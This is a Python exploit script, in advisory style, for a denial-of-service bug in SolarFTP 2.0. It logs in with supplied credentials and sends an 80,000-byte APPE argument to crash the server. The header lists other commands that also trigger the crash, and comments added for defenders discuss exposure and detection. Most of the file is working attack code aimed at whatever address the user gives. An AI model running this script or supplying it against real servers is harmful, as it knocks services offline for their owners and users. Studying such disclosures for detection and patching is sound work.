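#!/usr/bin/python
# Exploit Title: SolarFTP 2.0 Multiple Commands Denial of Service Vulnerability
# Date: 12/17/2010
# Author: modpr0be
# Software Link: http://www.solarftp.com/files/solarftps-setup.exe
# Vulnerable version: 2.0
# Tested on: Windows XP SP2, Windows XP SP3
# CVE : N/A
#
# ======================================================================
#___ _ _______ __
# ____/ (_)___ _(_) /_____ _/ / ________/ /_(_)___/ /_______ _
#/ __/ / __ `/ / __/ __ `/ / / _ \/ ___/ __ \/ / __/ __ \/ __ `/
# / /_/ / / /_/ / / /_/ /_/ / / /__/ /__/ / / / / /_/ / / / / /_/ /
# \__,_/_/\__, /_/\__/\__,_/_/\___/\___/_/ /_/_/\__,_/_/ /_/\__,_/
#/____/http://www.digital-echidna.org
# ======================================================================
#
# Greetz:
# say hello to all digital-echidna org crew:
# otoy, bean, s3o, d00m, n0rf0x, fm, gotechidna, manix
# special thx to amalia (^^), oebaj, offsec, exploit-db, corelan team
#
#### Software description:
# Solar FTP Server is a handy and easy to use personal FTP server with
# features like virtual directories, simple and intuitive user interface,
# real-time activity monitoring and management.
#
#### Exploit information:
# SolarFTP 2.0 will suddenly stop (crash) while these commands were sent:
# APPE, GET, PUT, NLST, and MDTM
# Sending USER with junk also crashing the Admin Configuration but not the service.
# Stack contains our junk in random. Both EIP and SEH were not overwritten.
#
#### Other information:
# 12/10/2010 - vendor contacted
# 12/17/2010 - no response, advisory released
#
#### Notes for defenders:
# The header above records no vendor response, so this file names no fixed
# version. The script logs in with the supplied credentials before sending
# the oversized command, so limiting which accounts and networks can reach
# the FTP service narrows exposure for the post-login commands; the USER
# crash of the Admin Configuration noted above is reported separately and
# is not exercised by this script.
# Written for Python 2: str values are passed straight to socket.send().

import socket
import sys

# Trigger payload: 80000 bytes of 0x41 ("A") used as the APPE argument.
# An FTP control-channel line of this size is far outside normal client
# behaviour, so a maximum command-line length enforced at an FTP proxy or
# flagged by an IDS is a reasonable detection signal for this crash.
junk = "\x41" * 80000


def banner():
    """Print the advisory title and author credit."""
    print("\nSolarFTP 2.0 Multiple Commands Denial of Service Vulnerability.")
    print("By: modpr0be (modpr0be[at]digital-echidna[dot]org)\n")


# Validate the command line before any socket is created, and exit non-zero
# so a calling harness can tell a usage error from a completed run.
if len(sys.argv) != 4:
    banner()
    print("Usage: %s <ip> <user> <pass>\n" % sys.argv[0])
    sys.exit(1)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
    s.connect((sys.argv[1], 21))
except socket.error:
    # Only connection failures are handled here; the original bare except
    # also swallowed KeyboardInterrupt and reported every failure as exit 0.
    print("Can\'t connect to server!\n")
    s.close()
    sys.exit(1)

try:
    s.recv(1024)  # server greeting
    s.send('USER ' + sys.argv[2] + '\r\n')
    s.recv(1024)
    s.send('PASS ' + sys.argv[3] + '\r\n')
    s.recv(1024)
    s.send('APPE ' + junk + '\r\n')
    # If the service has stopped, this read may raise or return an empty
    # string; either way the socket is released below.
    s.recv(1024)
finally:
    s.close()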